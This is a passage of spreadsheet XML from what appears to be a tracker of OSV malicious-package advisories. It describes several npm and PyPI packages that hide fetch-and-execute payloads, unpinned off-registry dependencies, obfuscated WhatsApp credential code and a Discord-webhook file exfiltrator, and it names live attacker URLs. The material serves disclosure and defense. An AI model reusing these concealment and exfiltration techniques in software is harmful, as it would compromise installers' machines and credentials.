`/api/v9/mfa/finish` with caller-supplied tokens against Discord targets — that portion is operator-directed third-party abuse and does not itself harm the installer.
</t>
        </is>
      </c>
      <c r="S1362" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16100</t>
        </is>
      </c>
    </row>
    <row r="1363">
      <c r="A1363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1363" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16101</t>
        </is>
      </c>
      <c r="D1363" s="5" t="inlineStr"/>
      <c r="E1363" s="5" t="inlineStr"/>
      <c r="F1363" s="5" t="inlineStr"/>
      <c r="G1363" s="5" t="inlineStr"/>
      <c r="H1363" s="5" t="inlineStr"/>
      <c r="I1363" s="5" t="inlineStr"/>
      <c r="J1363" s="5" t="inlineStr"/>
      <c r="K1363" s="5" t="inlineStr"/>
      <c r="L1363" s="5" t="inlineStr">
        <is>
          <t>npm:mfaby</t>
        </is>
      </c>
      <c r="M1363" s="5" t="inlineStr"/>
      <c r="N1363" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1363" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1363" s="5" t="inlineStr"/>
      <c r="Q1363" s="5" t="inlineStr"/>
      <c r="R1363" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c278e0ee3820cf701ef7ad65dfdab43a0765e5d3423286de99d3301fe39a8455)
The package presents itself as a Discord MFA helper, but its cache module contains a _warmSession routine that decodes a base64-encoded string (_CDN_BASE) into the URL https://limbomail.com/api/attachment/l4TIRPOsaUxR._603-vhKDRdgKl3RalN_TVUZYGPsJy2Y, downloads the response body, writes it to a file in os.tmpdir(), and executes it via new Worker(tmp). This chain fires when a consumer calls the documented entry point initMFA(). The fetched payload is opaque, unpinned, and hosted on a domain unrelated to the package's stated Discord functionality. The Discord TLS client additionally sets rejectUnauthorized:false, disabling certificate verification on outbound Discord traffic. The base64 concealment of the drop URL combined with a README cover-story describing it as a 'runtime patch asset' indicates deliberate hiding of the endpoint.
</t>
        </is>
      </c>
      <c r="S1363" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16101</t>
        </is>
      </c>
    </row>
    <row r="1364">
      <c r="A1364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1364" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16102</t>
        </is>
      </c>
      <c r="D1364" s="5" t="inlineStr"/>
      <c r="E1364" s="5" t="inlineStr"/>
      <c r="F1364" s="5" t="inlineStr"/>
      <c r="G1364" s="5" t="inlineStr"/>
      <c r="H1364" s="5" t="inlineStr"/>
      <c r="I1364" s="5" t="inlineStr"/>
      <c r="J1364" s="5" t="inlineStr"/>
      <c r="K1364" s="5" t="inlineStr"/>
      <c r="L1364" s="5" t="inlineStr">
        <is>
          <t>npm:mfatest2</t>
        </is>
      </c>
      <c r="M1364" s="5" t="inlineStr"/>
      <c r="N1364" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1364" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1364" s="5" t="inlineStr"/>
      <c r="Q1364" s="5" t="inlineStr"/>
      <c r="R1364" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8dea6c92bd37f4ff11dfa24ad1415d1a01351ee62baf37718a7c10362d393c15)
package.json declares its only runtime dependency as an unpinned GitHub ref (`"node-net-pool": "github:trktgq0wbre1/node-net-pool"`) pointing at a random-handle user account, contradicting the package's own 'Zero runtime dependencies — pure Node.js built-ins only' claim in the README. npm install resolves whatever HEAD of that repository currently returns, and lib/cache.js executes a top-level require of that dependency inside a swallowed try/catch, using the bracketed form `module['require']('node-net-pool')` that evades naive grep for require('node-net-pool'). The README documents an 'Asset prefetch' step in which the loaded dependency resolves a remote endpoint from an internal segment registry, downloads a 'runtime patch asset', and executes it as a detached background worker via child_process.execFile — placing the fetch-and-execute mechanism inside the mutable off-registry dependency that the author can update at any time. The package advertises Discord MFA / vanity-URL sniping, a category where such mislabeled-dependency channels are routinely used to smuggle credential-stealer code.
</t>
        </is>
      </c>
      <c r="S1364" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16102</t>
        </is>
      </c>
    </row>
    <row r="1365">
      <c r="A1365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1365" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16103</t>
        </is>
      </c>
      <c r="D1365" s="5" t="inlineStr"/>
      <c r="E1365" s="5" t="inlineStr"/>
      <c r="F1365" s="5" t="inlineStr"/>
      <c r="G1365" s="5" t="inlineStr"/>
      <c r="H1365" s="5" t="inlineStr"/>
      <c r="I1365" s="5" t="inlineStr"/>
      <c r="J1365" s="5" t="inlineStr"/>
      <c r="K1365" s="5" t="inlineStr"/>
      <c r="L1365" s="5" t="inlineStr">
        <is>
          <t>npm:@neroxkira/vangal-baileys</t>
        </is>
      </c>
      <c r="M1365" s="5" t="inlineStr"/>
      <c r="N1365" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1365" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1365" s="5" t="inlineStr"/>
      <c r="Q1365" s="5" t="inlineStr"/>
      <c r="R1365" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6af1543fb92f079191de134bd36dbb64c340928804df8486acf43546e2c6e185)
package.json declares `libsignal` with the source `github:RILLYZY/libsignal-node`, an unpinned reference to a third-party GitHub repository with no tag or commit SHA. On `npm install`, npm clones that repository's default branch HEAD and runs any lifecycle scripts contained in it; libsignal-node ships a native addon with build-time scripts. There is no version pin, hash, or integrity check, so whoever controls RILLYZY/libsignal-node controls install-time code execution on every installer of this package. The referenced GitHub account is unrelated to the libsignal upstream (signalapp) and to any publisher identity declared by this package.
</t>
        </is>
      </c>
      <c r="S1365" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16103</t>
        </is>
      </c>
    </row>
    <row r="1366">
      <c r="A1366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1366" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16104</t>
        </is>
      </c>
      <c r="D1366" s="5" t="inlineStr"/>
      <c r="E1366" s="5" t="inlineStr"/>
      <c r="F1366" s="5" t="inlineStr"/>
      <c r="G1366" s="5" t="inlineStr"/>
      <c r="H1366" s="5" t="inlineStr"/>
      <c r="I1366" s="5" t="inlineStr"/>
      <c r="J1366" s="5" t="inlineStr"/>
      <c r="K1366" s="5" t="inlineStr"/>
      <c r="L1366" s="5" t="inlineStr">
        <is>
          <t>npm:@nexustechpro/baileys</t>
        </is>
      </c>
      <c r="M1366" s="5" t="inlineStr"/>
      <c r="N1366" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1366" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1366" s="5" t="inlineStr"/>
      <c r="Q1366" s="5" t="inlineStr"/>
      <c r="R1366" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (fed8b2b0be012012aa9b1716e58c6d9e9a7302e431d5f8945e7b1196b6d7afab)
@nexustechpro/baileys is a fork of the WhatsApp library `baileys` in which lib/Socket/chats.js (~270 KB) is heavily obfuscated (obfuscator.io-style rotating string-array decoder, hex-escaped import specifiers such as '\x40\x63\x61\x63\x68\x65\x61\x62\x6c\x65\x2f\x6e\x6f\x64\x65\x2d\x63\x61\x63\x68\x65', integer-arithmetic control flow, unicode identifier names, ~2772-entry string array) while every sibling file in lib/Socket/ (groups.js, messages-recv.js, socket.js, registration.js) remains readable JavaScript and the upstream whiskeysockets/baileys ships this file unobfuscated. The obfuscated module is reachable from the package entry point (lib/index.js) and sits directly in the code path that handles WhatsApp session state (authState credentials, Signal identity keys, noise keys, signed pre-keys). package.json additionally declares `"whatsapp-rust-bridge": "latest"`, a floating unpinned tag on a non-upstream dependency, which allows that dependency's publisher to ship arbitrary code (including install lifecycle scripts) into every installer of this package on any future install with no version pin or integrity check.
</t>
        </is>
      </c>
      <c r="S1366" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16104</t>
        </is>
      </c>
    </row>
    <row r="1367">
      <c r="A1367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1367" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16105</t>
        </is>
      </c>
      <c r="D1367" s="5" t="inlineStr"/>
      <c r="E1367" s="5" t="inlineStr"/>
      <c r="F1367" s="5" t="inlineStr"/>
      <c r="G1367" s="5" t="inlineStr"/>
      <c r="H1367" s="5" t="inlineStr"/>
      <c r="I1367" s="5" t="inlineStr"/>
      <c r="J1367" s="5" t="inlineStr"/>
      <c r="K1367" s="5" t="inlineStr"/>
      <c r="L1367" s="5" t="inlineStr">
        <is>
          <t>npm:@sahril2nd/baileys</t>
        </is>
      </c>
      <c r="M1367" s="5" t="inlineStr"/>
      <c r="N1367" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1367" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1367" s="5" t="inlineStr"/>
      <c r="Q1367" s="5" t="inlineStr"/>
      <c r="R1367" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a3d2089d9678322dc8adbf5e6e740c29d6720133df3489970652a2100641435e)
This package is a fork of the Baileys WhatsApp library that embeds a hardcoded network destination hidden as a String.fromCharCode(...) decimal-ASCII array inside lib/Socket/messages-send.js. The decoded bytes at lines 425 and 436 reconstruct the URL https://fiora.nixel.my.id/ — a host unrelated to any documented Baileys/WhatsApp infrastructure. The destination is assembled at call-time from a numeric array rather than appearing as a plain-text literal, which is a deliberate concealment technique on the message-send code path where WhatsApp session data and outbound message content are handled. Obfuscated construction of a non-first-party destination inside the messaging pipeline of a WhatsApp client library is the shape of session/message exfiltration to an author-controlled endpoint.
</t>
        </is>
      </c>
      <c r="S1367" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16105</t>
        </is>
      </c>
    </row>
    <row r="1368">
      <c r="A1368" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1368" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16121</t>
        </is>
      </c>
      <c r="D1368" s="5" t="inlineStr"/>
      <c r="E1368" s="5" t="inlineStr"/>
      <c r="F1368" s="5" t="inlineStr"/>
      <c r="G1368" s="5" t="inlineStr"/>
      <c r="H1368" s="5" t="inlineStr"/>
      <c r="I1368" s="5" t="inlineStr"/>
      <c r="J1368" s="5" t="inlineStr"/>
      <c r="K1368" s="5" t="inlineStr"/>
      <c r="L1368" s="5" t="inlineStr">
        <is>
          <t>PyPI:websetup</t>
        </is>
      </c>
      <c r="M1368" s="5" t="inlineStr"/>
      <c r="N1368" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1368" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1368" s="5" t="inlineStr"/>
      <c r="Q1368" s="5" t="inlineStr"/>
      <c r="R1368" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">websetup@0.1.0 is a single module whose only function, setup.set(text=None, file_path=None) in websetup/sender.py, POSTs the given text and the contents of any local file path to a hardcoded Discord webhook (id 1546817174411288617; the name Discord returns for it is "backdoor") and swallows every exception. Nothing runs on install or import; the send happens when a caller invokes setup.set(). The destination is not configurable, so the package exists to move files off a machine to a channel the publisher controls. The Discord URL is listed under urls only.
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (e57a4e728de92fb3c7d7693551dec707f4b4c3a92bc1c9eff30eab0f92ac2d93)
The package exposes a single public API, websetup.setup.set(text, file_path), whose implementation unconditionally POSTs the caller-supplied text and the contents of the file at file_path to a hardcoded Discord webhook URL (discord.com/api/webhooks/1546817174411288617/...). The webhook destination is embedded as a class attribute on `setup`, is not caller-configurable, and is not disclosed in the README, which describes the project only as a generic 'websetup tool'. Any program that invokes this API silently forwards its inputs, including arbitrary file contents, to a Discord channel controlled by the package author.
</t>
        </is>
      </c>
      <c r="S1368" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16121</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S1368"/>
  <conditionalFormatting sqref="E2:E136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368">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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S362" r:id="rId361"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S363" r:id="rId362"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S364" r:id="rId363"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S365" r:id="rId364"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S366" r:id="rId365"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S367" r:id="rId366"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S368" r:id="rId367"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S369" r:id="rId368"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S370" r:id="rId369"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S371" r:id="rId370"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S372" r:id="rId371"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S373" r:id="rId372"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S374" r:id="rId373"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S375" r:id="rId374"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S376" r:id="rId375"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S377" r:id="rId376"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S378" r:id="rId377"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S379" r:id="rId378"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S380" r:id="rId379"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S381" r:id="rId380"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S382" r:id="rId381"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S383" r:id="rId382"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S384" r:id="rId383"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S385" r:id="rId384"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S386" r:id="rId385"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S387" r:id="rId386"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S388" r:id="rId387"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S389" r:id="rId388"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S390" r:id="rId389"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S391" r:id="rId390"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S392" r:id="rId391"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S393" r:id="rId392"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S394" r:id="rId393"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S395" r:id="rId394"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S396" r:id="rId395"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S397" r:id="rId396"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S398" r:id="rId397"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S399" r:id="rId398"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S400" r:id="rId399"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S401" r:id="rId400"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S402" r:id="rId401"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S403" r:id="rId402"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S404" r:id="rId403"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S405" r:id="rId404"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S406" r:id="rId405"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S407" r:id="rId406"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S408" r:id="rId407"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S409" r:id="rId408"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S410" r:id="rId409"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S411" r:id="rId410"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S412" r:id="rId411"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S413" r:id="rId412"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S414" r:id="rId413"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S415" r:id="rId414"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S416" r:id="rId415"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S417" r:id="rId416"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S418" r:id="rId417"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S419" r:id="rId418"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S420" r:id="rId419"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S421" r:id="rId420"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S422" r:id="rId421"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S423" r:id="rId422"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S424" r:id="rId423"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S425" r:id="rId424"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S426" r:id="rId425"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S427" r:id="rId426"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S428" r:id="rId427"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S429" r:id="rId428"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S430" r:id="rId429"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S431" r:id="rId430"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S432" r:id="rId431"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S433" r:id="rId432"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S434" r:id="rId433"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S435" r:id="rId434"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S436" r:id="rId435"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S437" r:id="rId436"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S438" r:id="rId437"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S439" r:id="rId438"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S440" r:id="rId439"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S441" r:id="rId440"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S442" r:id="rId441"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S443" r:id="rId442"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S444" r:id="rId443"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S445" r:id="rId444"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S446" r:id="rId445"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S447" r:id="rId446"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S448" r:id="rId447"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S449" r:id="rId448"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S450" r:id="rId449"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S451" r:id="rId450"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S452" r:id="rId451"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S453" r:id="rId452"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S454" r:id="rId453"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S455" r:id="rId454"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S456" r:id="rId455"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S457" r:id="rId456"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S458" r:id="rId457"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S459" r:id="rId458"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S460" r:id="rId459"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S461" r:id="rId460"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S462" r:id="rId461"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S463" r:id="rId462"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S464" r:id="rId463"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S465" r:id="rId464"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S466" r:id="rId465"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S467" r:id="rId466"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S468" r:id="rId467"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S469" r:id="rId468"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S470" r:id="rId469"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S471" r:id="rId470"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S472" r:id="rId471"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S473" r:id="rId472"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S474" r:id="rId473"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S475" r:id="rId474"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S476" r:id="rId475"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S477" r:id="rId476"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S478" r:id="rId477"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S479" r:id="rId478"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S480" r:id="rId479"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S481" r:id="rId480"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S482" r:id="rId481"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S483" r:id="rId482"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S484" r:id="rId483"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S485" r:id="rId484"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S486" r:id="rId485"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S487" r:id="rId486"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S488" r:id="rId487"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S489" r:id="rId488"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S490" r:id="rId489"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S491" r:id="rId490"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S492" r:id="rId491"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S493" r:id="rId492"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S494" r:id="rId493"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S495" r:id="rId494"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S496" r:id="rId495"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S497" r:id="rId496"/>
